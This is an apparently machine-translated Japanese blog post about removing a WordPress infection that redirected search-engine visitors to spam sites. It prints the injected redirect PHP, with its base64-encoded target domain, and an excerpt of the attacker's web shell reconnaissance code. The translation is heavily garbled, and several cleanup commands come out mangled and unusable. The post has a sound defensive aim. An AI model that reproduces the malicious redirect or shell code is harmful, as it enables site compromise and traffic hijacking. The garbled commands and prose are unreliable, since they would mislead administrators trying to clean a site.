ウイルスblogosphere…しかし、あなたは私と何を持っていましたか?!

先月、私は警告を受けました ウイルスブログ いくつかの訪問者である。 私はかなり良いアンチウイルスをインストールしたので、当初、私は、警告を無視して(カスペルスキーAV 2009長い時間のためのブログですが)そして、私は、ウイルス警告を(..私は最初のリフレッシュが消えたことを以前疑わしい何かを見た。最後に...)やったことがなかった。
ゆっくりと大きな変化を表示されるようになった 訪問者のトラフィックどのトラフィックが最近着実に落ちたと教えて、より多くの人になり始めた後その stealthsettings.COM それはあります virused。 アンチウイルスがブロック時昨日はスクリーンショットが行っ誰かから受け取った スクリプト から stealthsettings.com:トロイの木馬Clicker.HTML.IFrame.gr。 それは私が検索したすべてのソースを入れて、私にはかなり説得力があった。 私の心に来た最初のアイデアは、やっていた アップグレード 最新の WordPress (2.5.1)ただし、古いスクリプトのすべてのファイルを削除する前ではありません WordPress と作る バックアップデータベース。 この手順は機能せず、バグがどこにあるのかを理解するのに長い時間がかかったと思われます。 オイゲン コー​​ヒーを飲みながらの議論で、彼が発見 リンク Googleと、それは彼を見るのが良いでしょう。
MyDigitalLife.infoは、次のタイトルの記事を公開しました。WordPress ハック:Googleと検索エンジンを回復して修正するか、Cookieトラフィックをあなたにリダイレクトしない-Needs.info、AnyResults.Net、Golden-Info.net、その他の違法サイト"それは私が必要とされるスレッドの終わりです。
それはについてです エクスプロイト de WordPress クッキーに基づく、どの私が思うには、非常に複雑であり、本を作りました。 作るのに十分賢い SQLインジェクション ブログのデータベース, 目に見えないユーザーを作成する シンプルなルーチンチェック ダッシュボード->ユーザー, "書き込み可能な"サーバーディレクトリとファイルを確認してください (それか chmod 777)、検索して 実行します rootユーザーまたはグループの権限を持つファイル。 私は名前を悪用した人を知っていると多くのブログは、ルーマニアを含めて、感染しているという事実にもかかわらず、彼について書かれたいくつかの記事があることが表示されません。 [OK]を...私はウイルスについての一般論を説明しようとしようとするでしょう。

ウイルスとは何ですか?

まず、訪問者には見えないが、特にGoogleは、検索エンジンのための目に見えるとスローアウェイブログ、リンクに元ページを挿入。 このように 攻撃者によって示されたサイトにページランクを転送。 次に、別のものが挿入されます リダイレクト·コード グーグル、ライブ、ヤフーから来る訪問者のためのURL ...やRSSリーダーとしないサイト クッキー。 A アンチウイルス としてリダイレクトを検出 トロイの木馬Clicker.HTML.

症状:

訪問者のトラフィックの大幅な減少、特に、ほとんどの訪問者がGoogleから来たブログに。

識別: (これは、phpmyadmin、php、および linux)

LA。 ATTENTION! 最初のバックアップデータベースを作る!

1。 ソースファイルをチェック index.phpを, header.phpの, footer.php、ブログのトピックと暗号化を使用したコードがあるかどうかを確認 base64 または、次の形式で「if($ ser ==」1?&& sizeof($ _ COOKIE)== 0)」を含みます。

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

...または何か。 このコードを削除します!

画像をクリックして...

インデックスコード

上のスクリーンショットでは、誤って選択して「 "。 そのコードは残しておく必要があります。

2。 使用 phpMyAdminの とデータベース·テーブルに行く wp_users上で作成されないユーザー名がない場合どこチェック 00:00:00 0000-00-00 (可能な配置 USER_LOGIN 書くために"WordPress」。 このユーザーのID(IDフィールド)を書き留めてから削除します。

画像をクリックして...

偽ユーザー

*緑のラインが削除され、彼のIDを保持する必要があります。 の場合 眠いですID = 8ました .

3。 表に移動します wp_usermeta、どこへ 位置してワイプ IDの行(ここでフィールド USER_ID ID値)が削除されます。

4。 テーブル wp_option、に行く active_plugins そして容疑者を有効になっているのかプラグインを参照してください。 それは、終末のように使用することができ _old.giff、_old.pngg、_old.jpeg、_new.php.giffなど、偽の画像拡張機能と_oldおよび_newの組み合わせ。

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

このプラグインを削除してから、ブログ->ダッシュボード->プラグインに移動します。ここで、プラグインを非アクティブ化およびアクティブ化します。

それはactive_pluginsウイルスファイルが表示され見るには画像をクリックします。

プラグイン

active_pluginsに示されているFTPやSSH、上のパスに従って、サーバーからファイルを削除します。

5. phpMyAdmin のテーブルにもあります wp_optionを含む行を検索し、削除 "rss_f541b3abd05e7962fcab37737f40fad8"そして間で"internal_links_cache ".
internal_links_cacheであなたのブログやに現れる暗号化されたスパムのリンクが作られています のコード Google Adsうなじ、ハッカー。

6。 推奨することです パスワードを変更します ブログとログイン すべて疑わしいusereleを削除。 最新バージョンにアップグレードする WordPress 新しいユーザーが登録できないようにブログを設定します。 損失は​​ありません…無人でコメントすることもできます。

私はこのウイルスのブログをきれいにするために、そのような状況で何をすべきかを少し説明するために上記を試みました。 問題は見た目よりもはるかに深刻で、使用されているためほとんど解決されていません セキュリティの脆弱性 ブログでウェブサーバのホスティング、。

セキュリティの最初の対策として、アクセス権を持つ SSH、エンディング付き* _OLD *と* _new。*のように、任意のファイルかどうかを確認するためにサーバー上のいくつかのチェックを行います。ギフ、。JPEG、。pngg、。jpgg。 これらのファイルは削除する必要があります。 あなたは、例えば、ファイルの名前を変更した場合。 top_right_old.giff in top_right_old.php我々は、ファイルが正確にエクスプロイトコード·サーバーであることがわかります。

サーバーをチェック、クリーニング、および保護するためのいくつかの便利な手順。 (SSH経由)

1.  CDの/ tmp とのようなフォルダがあるかどうかを確認 tmpVFlma または他の組み合わせでは、同じ名前を持ち、それを削除します。 以下のスクリーンショットで、私からそのような2つのフォルダを参照してください:

tmpserver

RM-RFフォルダ名

2.チェックして排除(変更 chmod-ul) 可能な限り、属性を持つフォルダー chmod 777

現在のディレクトリ内の書き込み可能なファイルをすべて検索します。 見つける。 型F-パーマ-2-LS
現在のディレクトリ内のすべての書き込み可能なディレクトリを見つける: 見つける。 - タイプDパーマ-2-LS
現在のディレクトリ内の書き込み可能なディレクトリとファイルをすべて検索します。 見つけます。 許可します-2 -ls

3。 サーバー上の不審なファイルを探しています。

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, ATTENTION! ビットが設定されたファイル SUID si SGID. これらのファイルには、ユーザー(グループ)またはrootではなく、ファイルを実行するユーザの権限で実行されます。 これらのファイルは、セキュリティ上の問題ならば、根本的妥協につながることができます。 あなたはSUIDとSGIDビットでファイルを使用する場合、 '実行chmod 0 " オンまたはそれらを含むパッケージをアンインストールします。

エクスプロイトは、どこかにソースが含まれています...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

このようにして...基本的にはセキュリティに違反が見つかった。 ポートは、ディレクトリの "書き込み"とグループ実行権限ファイル/ルートを開きます。

戻るもっとで...

感染したいくつかのブログ:www.blegoo.com、www.visurat.ro、

fulgerica.com、denisuca.com、www.ecostin.com、
www.razvanmatasel.ro、

blog.hrmarket.ro、www.nitza.ro、
motociclete.motomag.ro、

emi.brainient.com、www.picsel.ro、

www.mihaidragan.ro/kindablog/、
krumel.seo-point.com、www.itex.ro / blog、
www.radiology.ro、

www.dipse.ro/ionut/、
www.vinul.ro/blog/、www.damaideparte.ro、

dragos.roua.ro、www.artistul.ro / blog /、

www.mirabilismedia.ro/blog、blog.einvest.ro
...リストに載っている...多くのことを。

Google検索エンジンを使用して、ブログが感染しているかどうかを確認できます。 コピーペースト:

サイトwww.blegoo.com買う

おやすみなさい、お疲れ様でした;)まもなく、Eugenはforeseeable.unpredictable.comでニュースをお届けすると思います。

BRB :)

注意! のテーマを変更する WordPress またはにアップグレードする WordPress 2.5.1は、このウイルスを駆除するためのソリューションではありません。

テクノロジー愛好者として、2006年からStealthSettings.comで喜んで記事を書いています。macOS、Windows、Linuxなどのオペレーティングシステムに豊富な経験があり、プログラミング言語やブログプラットフォーム(WordPress)などにも精通しています。オンラインストア(WooCommerce、Magento、PrestaShop)も含め、さまざまな分野での経験があります。

» 注目に値します » ウイルスblogosphere…しかし、あなたは私と何を持っていましたか?!
コメント